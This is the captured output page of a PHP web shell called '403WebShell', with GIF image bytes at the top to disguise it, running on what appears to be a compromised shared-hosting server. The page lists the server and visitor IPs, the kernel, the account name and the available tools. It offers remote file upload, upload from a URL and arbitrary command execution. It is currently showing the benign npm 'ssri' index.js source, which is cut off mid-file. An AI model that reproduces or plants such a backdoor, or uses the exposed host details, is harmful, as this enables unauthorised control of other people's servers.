GIF89a=
( õ' 7IAXKgNgYvYx\%wh…hŽth%ˆs%—x¨}9®Œ©€&©‰%¶†(¹–.¹5·œD¹&Çš)ÇŸ5ǘ;Í£*È¡&Õ²)ׯ7×µ<Ñ»4ï°3ø‘HÖ§KͯT÷¨Yÿšqÿ»qÿÔFØ                                                                           !ù

 ' !ÿ
NETSCAPE2.0
   ,    =
(  þÀ“pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§gª«ªE
¯°
¨¬ª±²Œ¹º¹E¾­”´ÂB¶¯ §Åȸ»ÑD¾¿Á•ÄÅ®° ÝH¾ÒLÀÆDÙ«D¶BÝïðÀ¾DÑÑÔTÌÍíH òGö¨A RÎڐ
|¥ÂÙ­&ºìE8œ¹kGÔAÞpx­a¶­ãR2XB®åE
8I€Õ6Xî:vT)äžþÀq¦è³¥ì仕F~%xñ Â
4#ZÔ‰O|-4Bs‘X:=
QÉ œš lºÒyXJŠGȦ|s
hÏíK–3l7·B|¥$'7Jީܪ‰‡àá”Dæn=Pƒ
¤Òëí‰`䌨ljóá¯Éüv>á–Á¼5
½.69ûϸd«­ºÀûnlv©‹ªîf{¬ÜãPbŸ
 l5‘Ž¯pß´
˜3aÅùäI«O’ý·‘áÞ‡˜¾Æ‚ÙÏiÇÿ‹Àƒ #öó)pâš Þ½	‘Ý{ó)vmÞü%D~6f s}ŃƒDØW Eþ`‡þ	À…L8xá†ç˜{)x`X/> Ì}mø‚–RØ‘*|`D=‚Ø_ ^ð5 !_…'aä“OÚ—7âcð`D”Cx`ÝÂ¥ä‹éY¹—F¼¤¥Š?¡Õ™ n@`}	lď’ÄÉ@4>ñd
œ à‘vÒxNÃ×™@žd=ˆgsžG±æ´²æud &p8Qñ)ˆ«lXD©øÜéAžHìySun jª×k*D¤LH]
†¦§C™Jä–´Xb~ʪwStŽ6K,°£qÁœ:9ت:¨þªl¨@¡`‚ûÚ	».Û¬¯
t‹ÆSÉ[:°=Š‹„‘Nåû”Ìî{¿ÂA ‡Rà›ÀÙ6úë°
Ÿð0Ä_ 
½;ÃϱîÉì^ÇÛÇ#Ëë¼ôº!±Ä˜íUîÅÇ;0L1óÁµö«p%
AÀºU̬ݵ¼á%霼€‡¯Á~`ÏG¯»À×
 ­²± =4ªnpð3¾¤³¯­ü¾¦îuÙuµÙ®|%2ÊIÿür¦#0·ÔJ``8È@S@5ê¢ö×Þ^`8EÜ]
ý.뜃Âç 7 ú ȉÞj œ½Dç 
zý¸iþœÑÙûÄë!ˆÞÀl§Ïw‹*DçI€nEX¯¬¼	&A
¬Go¼QföõFç°¯;é¦÷îŽêJ°îúôF5¡ÌQ|îúöXªæ»TÁÏyñêï]ê² o óÎC=öõ›ÒÓPB@ D×½œä(>èCÂ
xŽ`±«Ÿ–JЀ»Û á¤±p+eE0`ëŽ`AÚ/NE€Ø†À9‚@¤à	H½7”à‡%B‰`À
l*ƒó‘–
‡8 2ñ%¸ —€:Ù1Á‰E¸àux%
nP1ð!‘ðC)¾P81lÑɸF#ˆ€{´âé°ÈB„0>±û
°b¡Š´±O‚3È–Ù()yRpbµ¨E.Z‘D8ÊH@%òŒx+%Ù˜Æcü »¸˜fõ¬b·d`Fê™8èXH"ÉÈ-±|1Ô6iI, 2““¬$+](A*jÐQTÂ
o‰.ÛU슬Œã„Ž`¯SN¡–¶Äåyše¯ª’­¬‚´b¦Éož œ)åyâ@Ì®3	ÎtT̉°&Ø+žLÀf"Ø-|žçÔ>‡Ðv¦Ðžì\‚ Q1)Ž@Žh#aP72”ˆ™¨$‚  !ù

 " ,    =
( …7IAXG]KgNgYvYxR"k\%w]'}hŽth%ˆg+ˆs%—r.—m3šx3˜x¨}9®€&©€+¨‡7§‰%¶†(¹–.¹œD¹&ǘ;Í•&ײ)×»4ïÌ6ò§KÍ                                                                                          þ@‘pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g
 «¬ E 
±±
¨­¶°ººE
Á´”·®C¬²
§Ç¶
Œ»ÓDÃÕƷ¯Ê±H½ºM×ÁGÚ¬D¶BËÁ½î½DÓôTÏÛßîG»ôõC×CÌ	l&âž:'òtU³6ɹ#·Ø)€'Ü.6±&ëÍÈ»
K(8p0N?!æ2"ÛˆNIJX>R¼ÐO‚M	'¡¨2¸*Ÿþ>#nâ†
å@‚<[:¡Iïf’ ¤TÚ˘CdbÜÙ“[«ŽEú5MBo¤
×@€`@„€Êt W-3 ¶Ÿ¡BíêäjIÝ…Eò9[T…$íêﯧ„…•s»Óȳ¹€ÅÚdc®UUρ#±Ùïldj?´í¼²`\ŽÁðÞu|3'ÖŒ]ë6 ¶S#²‡˜FKLÈ *N
E´‘áäŠ$˜›eÄYD„ºq«.è촁ƒs \-ÔjA9²õ÷å- üúM[Âx(ís÷ì®x€|í¡Ù’p¦
‚ ŽkÛTÇDpE@WÜ	²Ç]kŠ1¨ þ€·Yb ÓÁ‰l°*n0 ç™—žzBdОu¾7ĉBl€â‰-ºx~|UåU‰
 h*Hœ|e"#"?vpÄiŠe6^ˆ„+qâŠm8  #VÇá <Fù–C™Ä^F9Ä #­ÉRAGb©d“(0$kêè‘ž¨'L¢)B]æù¨eŠ>‘å–ÄV„œ|Šè•m"сœn|@
›U¶ÆΞ—Špb¥G¨ED”€±Úê2FÌIç?
>Éxå
α
¡¤„%‘žjŸ‘ꄯ<Ìaà9ijÐ2˜D¦È&›†Z`‚å]wþ¼Â:ç6àB¤7eFJ|õÒ§Õ,¨äàFÇ®cS·Ê¶+B°,‘Þ˜ºNûãØ>PADÌHD¹æž«ÄÀnÌ¥}­#Ë’ë
QÀÉSÌÂÇ2ÌXÀ{æk²
lQÁ2«ÊðÀ¯w|2Íh‹ÄÂG€,m¾¶ë3ÐÙ6-´ÅE¬L°ÆIij*K½ÀÇqï`DwVÍQXœÚÔpeœ±¬Ñ	q˜§Tœ½µƒ°Œìu Â<¶aØ*At¯lmEØ
üôÛN[P1ÔÛ¦­±$ÜÆ@`ùåDpy¶yXvCAyåB`ŽD¶	0QwG#¯
æš[^Äþ	$ÀÓÝǦ{„L™[±úKÄgÌ;ï£S~¹ìGX.ôgoT.»åˆ°ùŸûù¡?1zö¦Ÿž:ÅgÁ|ì<O»í!‹œ{÷E ÿ{ðVðÚú×Cß{òËgo„óõú’'߁zEHÔrJÅ=˜5€Ýé²¥ºá¹î4Â÷ˆÐ´V	w ƒß$xVA.¬+üä'ÊE„E ^ž‡©£•84`K—>L¹„®£œŠ‚à0œ]PÁ^p	F<"•ç?!,ñ‡N4—…PÄ Á„ö¨Û:Tè@hÀ‹%táÿ:ø-
žI<`þ‹p I….)^ 40D#p@ƒj4–؀:²‰1Øâr˜¼F2oW¼#Z†;$Q	q”
‘ ÂK¦ñNl#29 !’F@¥Bh·ᏀL!—XFóLH‘Kh¤.«hE&JòG¨¥<™WN!€ÑÙÚˆY„@†>Œž19J" 2,/
&.GXB%ÌRÈ9B6¹W]’î×ÔW¥’IÎ$ ñ‹ÓŒE8YÆ	¼³™ñA5“à®Q.aŸB€&Ø©³ JÁ—!	¦t)K%tœ-¦JF
bòNMxLôþ)ÐR¸Ð™‘ èÝ6‘O!THÌ„HÛ	‰   !ù

 ) ,    =
( …AXKgNgYvYxR"k\%wh…hŽh%ˆg+ˆs%—r.—x3˜x¨}9®€&©€+¨Œ,©‡7§‰%¶†(¹–.¹5·&Çš)ǘ;Í•&×£*Ȳ)ׯ7×»4ï°3øÌ6ò‘HÖ§KÍ»Hó¯T÷¨Yÿ»qÿÇhÿ                                                                     þÀ”pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g ª«

E$±²¨ª­
·
°²½$E$ÂÕ««D· Í ¿¦Ç¶¸ÌŒ¾³CÃÅÆ EééH½MÛÂGâªD­çBêêϾD²ÒaÀà€Š1r­ðÓ¤	ÔožzU!L˜C'¾yW½UGtäÇïÙllê
0×àÂuGþ)AÀs[þ·xì
ÁxO%ƒûX2ó—

P£n›R/¡ÑšHše+êDm?#—‘Ç£6¡8íJ¡ŸâDiäªM¥Ö„ôj“¬¹£5oQ7°-
<‡
*´lãÓŒ2r/a!l)dÈ A™ÈE¢ôÔ͆…ð;Ö˜c ¡%ß‚’Ùˆâ¸b½—pe~C"BíëÚHïeF2§æŠ8qb t_`urŠeü
wÅu3êæPv§h•"ß`íÍxçLĹÜÖ3á
 ~Öº“®›¸ÏMDfJÙ
°„
ÛµáWõ%§œ‚à©–‚X Ó؁)@®Ñ›Eþ´wëuÅSxb8y\mÖzœ¥§ZbºE—ÂLªÌw!y(>¡™wú=Ç|ÅÝs¢d€CÁW)HÜcC$€L 
Ä7„r.á\{)@ð` @	äXÈ$PD” `šaG:§æˆOˆ72EÐamn]ù"ŒcÊxÑŒ° &dR8`g«iÙŸLR!¦
P
…d’ä¡“¦ðÎTƒ¦ià|À
 _

¥ Qi#¦Šg›Æ ›noMµ
›V
ã£)p ç£ÎW…š=Âeªk§†j„ ´®1ß²sÉxéW«jšl|0¯B0Û, 
\jÛ´›6±¬¶C
ÛíWþï|ëÙ‹¸ñzĸV {ì;Ýñn¼òVˆm³I¼³.Ðã¤PN¥
²µ¼„µCã+¹ÍByî£Ñ¾HŸ›ëêÂ
7ìYÆFTk¨SaoaY$Dµœìï¿Ã29RÈkt Çïfñ ÇÒ:ÀÐSp¹3ÇI¨â¥DZÄ ü9Ïýögñ½­uÔ*
3)O‘˜Ö[_hv
,àî×EtŸé¶BH€Õ[ü±64M@ÔSÌM7dÐl5-ÄÙU܍´©zߌ3Ô€3ž„ „ ¶ÛPô½5×g›
êÚ˜kN„Ý…0Îj4€Ìë°“#{þÕ3S2çKÜ'ợlø¼Ú2K{° {Û¶?žm𸧠ËI¼nEò='êüóºè^üæÃ_Û=°óž‚ì#Oý¿Í'¡½áo..ÏYìnüñCœO±Áa¿¢Kô½o,üÄËbö²çºí
ï{ËC Ú—"”Ï{ËK ÍÒw„õ±Oz dÕ¨à:$ ƒô—«v»]	A#ð «€¿šéz)
Rx׿ˆ¥‚d``èw-îyÏf×K!ð€þ­Ð|ìPľ„=Ì`ý(f” 'Pa
¥ÐBJa%Ðâf§„%Š¡}FàáÝ×6>ÉäŠG"éŽè=ø!oŠ°^FP¼Ø©Q„ÀCÙÁ`(Ž\ÄÝ®
©Â$<n@dÄ E#ììUÒI! ‚#lù‹`k¦ÐÇ'Rró’ZýNBÈMF
Í[¤+‹ðɈ-áwj¨¥þ8¾rá
,VÂh„"|½œ=×G_¦Ñ™EØ 0i*%̲˜Æda0mV‚k¾)›;„&6 p>ÓjK“¦Ç#
âDÂ:ûc?:R	Ó¬fÞéI-Ì“•Ã<ä=™Ï7˜3œ¨˜c2ŒW	,
ˆ”8(T™P‰F¡Jhç"‚  ;<html>
<!doctypehtml><html><head><title>403WebShell</title><meta content="noindex"name="robots"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Consolas,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#5e5e5e}#content .first:hover{background-color:#25383c;text-shadow:0 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#df5;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee" size="5">403Webshell</font></center>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Server IP : <font color=#df5>104.21.83.152</font> &nbsp;/&nbsp; Your IP : <font color=#df5>216.73.216.66</font><br>Web Server : <font color='#df5'>LiteSpeed</font><br>System : <font color='#df5'>Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64</font><br>User : <font color='#df5'>akhalid&nbsp;</font>( <font color='#df5'>749</font>)<br>PHP Version : <font color='#df5'>8.3.22</font><br>Disable Function : <font color='#df5'>NONE</font></font><br>MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=green>ON</font> &nbsp;|&nbsp; Perl : <font color=green>ON</font> &nbsp;|&nbsp; Python : <font color=green>ON</font> &nbsp;|&nbsp; Sudo : <font color=red>OFF</font> &nbsp;|&nbsp; Pkexec : <font color=red>OFF</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/opt">opt</a>/<a href="?loknya=/opt/alt">alt</a>/<a href="?loknya=/opt/alt/alt-nodejs20">alt-nodejs20</a>/<a href="?loknya=/opt/alt/alt-nodejs20/root">root</a>/<a href="?loknya=/opt/alt/alt-nodejs20/root/usr">usr</a>/<a href="?loknya=/opt/alt/alt-nodejs20/root/usr/lib">lib</a>/<a href="?loknya=/opt/alt/alt-nodejs20/root/usr/lib/node_modules">node_modules</a>/<a href="?loknya=/opt/alt/alt-nodejs20/root/usr/lib/node_modules/npm">npm</a>/<a href="?loknya=/opt/alt/alt-nodejs20/root/usr/lib/node_modules/npm/node_modules">node_modules</a>/<a href="?loknya=/opt/alt/alt-nodejs20/root/usr/lib/node_modules/npm/node_modules/ssri">ssri</a>/<a href="?loknya=/opt/alt/alt-nodejs20/root/usr/lib/node_modules/npm/node_modules/ssri/lib">lib</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ <font color='red'>Writeable</font> ]
<input type="radio" value="2" name="dirnya" >document_root [ <font color='green'>Writeable</font> ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://linuxploit.com/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="kerang.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form><br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #000" value="">
<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">
</form></table><br><hr><center style="font-family: Russo One">[ <a href='/228ef4/index.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><tr><td>Current File : /opt/alt/alt-nodejs20/root/usr/lib/node_modules/npm/node_modules/ssri/lib/index.js</tr></td></table><br/><pre>&#039;use strict&#039;

const crypto = require(&#039;crypto&#039;)
const { Minipass } = require(&#039;minipass&#039;)

const SPEC_ALGORITHMS = [&#039;sha512&#039;, &#039;sha384&#039;, &#039;sha256&#039;]
const DEFAULT_ALGORITHMS = [&#039;sha512&#039;]

// TODO: this should really be a hardcoded list of algorithms we support,
// rather than [a-z0-9].
const BASE64_REGEX = /^[a-z0-9+/]+(?:=?=?)$/i
const SRI_REGEX = /^([a-z0-9]+)-([^?]+)([?\S*]*)$/
const STRICT_SRI_REGEX = /^([a-z0-9]+)-([A-Za-z0-9+/=]{44,88})(\?[\x21-\x7E]*)?$/
const VCHAR_REGEX = /^[\x21-\x7E]+$/

const getOptString = options =&gt; options?.length ? `?${options.join(&#039;?&#039;)}` : &#039;&#039;

class IntegrityStream extends Minipass {
  #emittedIntegrity
  #emittedSize
  #emittedVerified

  constructor (opts) {
    super()
    this.size = 0
    this.opts = opts

    // may be overridden later, but set now for class consistency
    this.#getOptions()

    // options used for calculating stream.  can&#039;t be changed.
    if (opts?.algorithms) {
      this.algorithms = [...opts.algorithms]
    } else {
      this.algorithms = [...DEFAULT_ALGORITHMS]
    }
    if (this.algorithm !== null &amp;&amp; !this.algorithms.includes(this.algorithm)) {
      this.algorithms.push(this.algorithm)
    }

    this.hashes = this.algorithms.map(crypto.createHash)
  }

  #getOptions () {
    // For verification
    this.sri = this.opts?.integrity ? parse(this.opts?.integrity, this.opts) : null
    this.expectedSize = this.opts?.size

    if (!this.sri) {
      this.algorithm = null
    } else if (this.sri.isHash) {
      this.goodSri = true
      this.algorithm = this.sri.algorithm
    } else {
      this.goodSri = !this.sri.isEmpty()
      this.algorithm = this.sri.pickAlgorithm(this.opts)
    }

    this.digests = this.goodSri ? this.sri[this.algorithm] : null
    this.optString = getOptString(this.opts?.options)
  }

  on (ev, handler) {
    if (ev === &#039;size&#039; &amp;&amp; this.#emittedSize) {
      return handler(this.#emittedSize)
    }

    if (ev === &#039;integrity&#039; &amp;&amp; this.#emittedIntegrity) {
      return handler(this.#emittedIntegrity)
    }

    if (ev === &#039;verified&#039; &amp;&amp; this.#emittedVerified) {
      return handler(this.#emittedVerified)
    }

    return super.on(ev, handler)
  }

  emit (ev, data) {
    if (ev === &#039;end&#039;) {
      this.#onEnd()
    }
    return super.emit(ev, data)
  }

  write (data) {
    this.size += data.length
    this.hashes.forEach(h =&gt; h.update(data))
    return super.write(data)
  }

  #onEnd () {
    if (!this.goodSri) {
      this.#getOptions()
    }
    const newSri = parse(this.hashes.map((h, i) =&gt; {
      return `${this.algorithms[i]}-${h.digest(&#039;base64&#039;)}${this.optString}`
    }).join(&#039; &#039;), this.opts)
    // Integrity verification mode
    const match = this.goodSri &amp;&amp; newSri.match(this.sri, this.opts)
    if (typeof this.expectedSize === &#039;number&#039; &amp;&amp; this.size !== this.expectedSize) {
      /* eslint-disable-next-line max-len */
      const err = new Error(`stream size mismatch when checking ${this.sri}.\n  Wanted: ${this.expectedSize}\n  Found: ${this.size}`)
      err.code = &#039;EBADSIZE&#039;
      err.found = this.size
      err.expected = this.expectedSize
      err.sri = this.sri
      this.emit(&#039;error&#039;, err)
    } else if (this.sri &amp;&amp; !match) {
      /* eslint-disable-next-line max-len */
      const err = new Error(`${this.sri} integrity checksum failed when using ${this.algorithm}: wanted ${this.digests} but got ${newSri}. (${this.size} bytes)`)
      err.code = &#039;EINTEGRITY&#039;
      err.found = newSri
      err.expected = this.digests
      err.algorithm = this.algorithm
      err.sri = this.sri
      this.emit(&#039;error&#039;, err)
    } else {
      this.#emittedSize = this.size
      this.emit(&#039;size&#039;, this.size)
      this.#emittedIntegrity = newSri
      this.emit(&#039;integrity&#039;, newSri)
      if (match) {
        this.#emittedVerified = match
        this.emit(&#039;verified&#039;, match)
      }
    }
  }
}

class Hash {
  get isHash () {
    return true
  }

  constructor (hash, opts) {
    const strict = opts?.strict
    this.source = hash.trim()

    // set default values so that we make V8 happy to
    // always see a familiar object template.
    this.digest = &#039;&#039;
    this.algorithm = &#039;&#039;
    this.options = []

    // 3.1. Integrity metadata (called &quot;Hash&quot; by ssri)
    // https://w3c.github.io/webappsec-subresource-integrity/#integrity-metadata-description
    const match = this.source.match(
      strict
        ? STRICT_SRI_REGEX
        : SRI_REGEX
    )
    if (!match) {
      return
    }
    if (strict &amp;&amp; !SPEC_ALGORITHMS.includes(match[1])) {
      return
    }
    this.algorithm = match[1]
    this.digest = match[2]

    const rawOpts = match[3]
    if (rawOpts) {
      this.options = rawOpts.slice(1).split(&#039;?&#039;)
    }
  }

  hexDigest () {
    return this.digest &amp;&amp; Buffer.from(this.digest, &#039;base64&#039;).toString(&#039;hex&#039;)
  }

  toJSON () {
    return this.toString()
  }

  match (integrity, opts) {
    const other = parse(integrity, opts)
    if (!other) {
      return false
    }
    if (other.isIntegrity) {
      const algo = other.pickAlgorithm(opts, [this.algorithm])

      if (!algo) {
        return false
      }

      const foundHash = other[algo].find(hash =&gt; hash.digest === this.digest)

      if (foundHash) {
        return foundHash
      }

      return false
    }
    return other.digest === this.digest ? other : false
  }

  toString (opts) {
    if (opts?.strict) {
      // Strict mode enforces the standard as close to the foot of the
      // letter as it can.
      if (!(
        // The spec has very restricted productions for algorithms.
        // https://www.w3.org/TR/CSP2/#source-list-syntax
        SPEC_ALGORITHMS.includes(this.algorithm) &amp;&amp;
        // Usually, if someone insists on using a &quot;different&quot; base64, we
        // leave it as-is, since there&#039;s multiple standards, and the
        // specified is not a URL-safe variant.
        // https://www.w3.org/TR/CSP2/#base64_value
        this.digest.match(BASE64_REGEX) &amp;&amp;
        // Option syntax is strictly visual chars.
        // https://w3c.github.io/webappsec-subresource-integrity/#grammardef-option-expression
        // https://tools.ietf.org/html/rfc5234#appendix-B.1
        this.options.every(opt =&gt; opt.match(VCHAR_REGEX))
      )) {
        return &#039;&#039;
      }
    }
    return `${this.algorithm}-${this.digest}${getOptString(this.options)}`
  }
}

function integrityHashToString (toString, sep, opts, hashes) {
  const toStringIsNotEmpty = toString !== &#039;&#039;

  let shouldAddFirstSep = false
  let complement = &#039;&#039;

  const lastIndex = hashes.length - 1

  for (let i = 0; i &lt; lastIndex; i++) {
    const hashString = Hash.prototype.toString.call(hashes[i], opts)

    if (hashString) {
      shouldAddFirstSep = true

      complement += hashString
      complement += sep
    }
  }

  const finalHashString = Hash.prototype.toString.call(hashes[lastIndex], opts)

  if (finalHashString) {
    shouldAddFirstSep = true
    complement += finalHashString
  }

  if (toStringIsNotEmpty &amp;&amp; shouldAddFirstSep) {
    return toString + sep + complement
  }

  return toString + complement
}

class Integrity {
  get isIntegrity () {
    return true
  }

  toJSON () {
    return this.toString()
  }

  isEmpty () {
    return Object.keys(this).length === 0
  }

  toString (opts) {
    let sep = opts?.sep || &#039; &#039;
    let toString = &#039;&#039;

    if (opts?.strict) {
      // Entries must be separated by whitespace, according to spec.
      sep = sep.replace(/\S+/g, &#039; &#039;)

      for (const hash of SPEC_ALGORITHMS) {
        if (this[hash]) {
          toString = integrityHashToString(toString, sep, opts, this[hash])
        }
      }
    } else {
      for (const hash of Object.keys(this)) {
        toString = integrityHashToString(toString, sep, opts, this[hash])
      }
    }

    return toString
  }

  concat (integrity, opts) {
    const other = typeof integrity === &#039;string&#039;
      ? integrity
      : stringify(integrity, opts)
    return parse(`${this.toString(opts)} ${other}`, opts)
  }

  hexDigest () {
    return parse(this, { single: true }).hexDigest()
  }

  // add additional hashes to an integrity value, but prevent
  // *changing* an existing integrity hash.
  merge (integrity, opts) {
    const other = parse(integrity, opts)
    for (const algo in other) {
      if (this[algo]) {
        if (!this[algo].find(hash =&gt;
          other[algo].find(otherhash =&gt;
            hash.digest === otherhash.digest))) {
          throw new Error(&#039;hashes do not match, cannot update integrity&#039;)
        }
      } else {
        this[algo] = other[algo]
      }
    }
  }

  match (integrity, opts) {
    const other = parse(integrity, opts)
    if (!other) {
      return false
    }
    const algo = other.pickAlgorithm(opts, Object.keys(this))
    return (
      !!algo &amp;&amp;
      this[algo] &amp;&amp;
      other[algo] &amp;&amp;
      this[algo].find(hash =&gt;
        other[algo].find(otherhash =&gt;
          hash.digest === otherhash.digest
        )
      )
    ) || false
  }

  // Pick the highest priority algorithm present, optionally also limited to a
  // set of hashes found in another integrity.  When limiting it may return
  // nothing.
  pickAlgorithm (opts, hashes) {
    const pickAlgorithm = opts?.pickAlgorithm || getPrioritizedHash
    const keys = Object.keys(this).filter(k =&gt; {
      if (hashes?.length) {
        return hashes.includes(k)
      }
      return true
    })
    if (keys.length) {
      return keys.reduce((acc, algo) =&gt; pickAlgorithm(acc, algo) || acc)
    }
    // no intersection between this and hashes,
    return null
  }
}

module.exports.parse = parse
function parse (sri, opts) {
  if (!sri) {
    return null
  }
  if (typeof sri === &#039;string&#039;) {
    return _parse(sri, opts)
  } else if (sri.algorithm &amp;&amp; sri.digest) {
    const fullSri = new Integrity()
    fullSri[sri.algorithm] = [sri]
    return _parse(stringify(fullSri, opts), opts)
  } else {
    return _parse(stringify(sri, opts), opts)
  }
}

function _parse (integrity, opts) {
  // 3.4.3. Parse metadata
  // https://w3c.github.io/webappsec-subresource-integrity/#parse-metadata
  if (opts?.single) {
    return new Hash(integrity, opts)
  }
  const hashes = integrity.trim().split(/\s+/).reduce((acc, string) =&gt; {
    const hash = new Hash(string, opts)
    if (hash.algorithm &amp;&amp; hash.digest) {
      const algo = hash.algorithm
      if (!acc[algo]) {
        acc[algo] = []
      }
      acc[algo].push(hash)
    }
    return acc
  }, new Integrity())
  return hashes.isEmpty() ? null : hashes
}

module.exports.stringify = stringify
function stringify (obj, opts) {
  if (obj.algorithm &amp;&amp; obj.digest) {
    return Hash.prototype.toString.call(obj, opts)
  } else if (typeof obj === &#039;string&#039;) {
    return stringify(parse(obj, opts), opts)
  } else {
    return Integrity.prototype.toString.call(obj, opts)
  }
}

module.exports.fromHex = fromHex
function fromHex (hexDigest, algorithm, opts) {
  const optString = getOptString(opts?.options)
  return parse(
    `${algorithm}-${
      Buffer.from(hexDigest, &#039;hex&#039;).toString(&#039;base64&#039;)
    }${optString}`, opts
  )
}

module.exports.fromData = fromData
function fromData (data, opts) {
  const algorithms = opts?.algorithms || [...DEFAULT_ALGORITHMS]
  const optString = getOptString(opts?.options)
  return algorithms.reduce((acc, algo) =&gt; {
    const digest = crypto.createHash(algo).update(data).digest(&#039;base64&#039;)
    const hash = new Hash(
      `${algo}-${digest}${optString}`,
      opts
    )
    /* istanbul ignore else - it would be VERY strange if the string we
     * just calculated with an algo did not have an algo or digest.
     */
    if (hash.algorithm &amp;&amp; hash.digest) {
      const hashAlgo = hash.algorithm
      if (!acc[hashAlgo]) {
        acc[hashAlgo] = []
      }
      acc[hashAlgo].push(hash)
    }
    return acc
  }, new Integrity())
}

module.exports.fromStream = fromStream
function fromStream (stream, opts) {
  const istream = integrityStream(opts)
  return new Promise((resolve, reject) =&gt; {
    stream.pipe(istream)
    stream.on(&#039;error&#039;, reject)
    istream.on(&#039;error&#039;, reject)
    let sri
    istream.on(&#039;integrity&#039;, s =&gt; {
      sri = s
    })
    istream.on(&#039;end&#039;, () =&gt; resolve(sri))
    istream.resume()
  })
}

module.exports.checkData = checkData
function checkData (data, sri, opts) {
  sri = parse(sri, opts)
  if (!sri || !Object.keys(sri).length) {
    if (opts?.error) {
      throw Object.assign(
        new Error(&#039;No valid integrity hashes to check against&#039;), {
          code: &#039;EINTEGRITY&#039;,
        }
      )
    } else {
      return false
    }
  }
  const algorithm = sri.pickAlgorithm(opts)
  const digest = crypto.createHash(algorithm).update(data).digest(&#039;base64&#039;)
  const newSri = parse({ algorithm, digest })
  const match = newSri.match(sri, opts)
  opts = opts || {}
  if (match || !(opts.error)) {
    return match
  } else if (typeof opts.size === &#039;number&#039; &amp;&amp; (data.length !== opts.size)) {
    /* eslint-disable-next-line max-len */
    const err = new Error(`data size mismatch when checking ${sri}.\n  Wanted: ${opts.size}\n  Found: ${data.length}`)
    err.code = &#039;EBADSIZE&#039;
    err.found = data.length
    err.expected = opts.size
    err.sri = sri
    throw err
  } else {
    /* eslint-disable-next-line max-len */
    const err = new Error(`Integrity checksum failed when using ${algorithm}: Wanted ${sri}, but got ${newSri}. (${data.length} bytes)`)
    err.code = &#039;EINTEGRITY&#039;
    err.found = newSri
    err.expected = sri
    err.algorithm = algorithm
    err.sri = sri
    throw err
  }
}

module.exports.checkStream = checkStream
function checkStream (stream, sri, opts) {
  opts = opts || Object.create(null)
  opts.integrity = sri
  sri = parse(sri, opts)
  if (!sri || !Object.keys(sri).length) {
    return Promise.reject(Object.assign(
      new Error(&#039;No valid integrity hashes to check against&#039;), {
        code: &#039;EINTEGRITY&#039;,
      }
    ))
  }
  const checker = integrityStream(opts)
  return new Promise((resolve, reject) =&gt; {
    stream.pipe(checker)
    stream.on(&#039;error&#039;, reject)
    checker.on(&#039;error&#039;, reject)
    let verified
    checker.on(&#039;verified&#039;, s =&gt; {
      verified = s
    })
    checker.on(&#039;end&#039;, () =&gt; resolve(verified))
    checker.resume()
  })
}

module.exports.integrityStream = integrityStream
function integrityStream (opts = Object.create(null)) {
  return new IntegrityStream(opts)
}

module.exports.create = createIntegrity
function createIntegrity (opts) {
  const algorithms = opts?.algorithms || [...DEFAULT_ALGORITHMS]
  const optString = getOptString(opts?.options)

  const hashes = algorithms.map(crypto.createHash)

  return {
    update: function (chunk, enc) {
      hashes.forEach(h =&gt; h.update(chunk, enc))
      return this
    },
    digest: function () {
      const integrity = algorithms.reduce((acc, algo) =&gt; {
        const digest = hashes.shift().digest(&#039;base64&#039;)
        const hash = new Hash(
          `${algo}-${digest}${optString}`,
          opts
        )
        /* istanbul ignore else - it would be VERY strange if the hash we
         * just calculated with an algo did not have an algo or digest.
         */
        if (hash.algorithm &amp;&amp; hash.digest) {
          const hashAlgo = hash.algorithm
